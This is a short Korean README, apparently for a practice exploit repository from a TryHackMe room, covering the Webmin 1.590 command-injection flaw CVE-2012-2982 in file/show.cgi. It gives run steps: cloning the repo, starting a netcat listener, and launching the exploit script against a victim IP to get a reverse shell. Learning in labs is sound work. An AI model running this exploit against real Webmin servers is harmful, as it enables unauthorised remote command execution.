
Tryhackme의 초급 POC 스크립팅 방에서 POC 스크립팅을 연습합니다 (Linux용)
Webmin 1.590 및 이전 버전의 file/show.cgi는 원격 인증 사용자가 경로명에 유효하지 않은 문자를 통해 임의의 명령을 실행할 수 있도록 허용하며, | (파이프) 문자가 그 예입니다.
git clone https://github.com/CpyRe/CVE-2012-2982.gitpip3 install -r requirements.txtnc -nlvp <port>python3 exp.py <myip> <vulnip> <port>
또는
python3 subprocess-exp.py <myip> <vulnip> <port>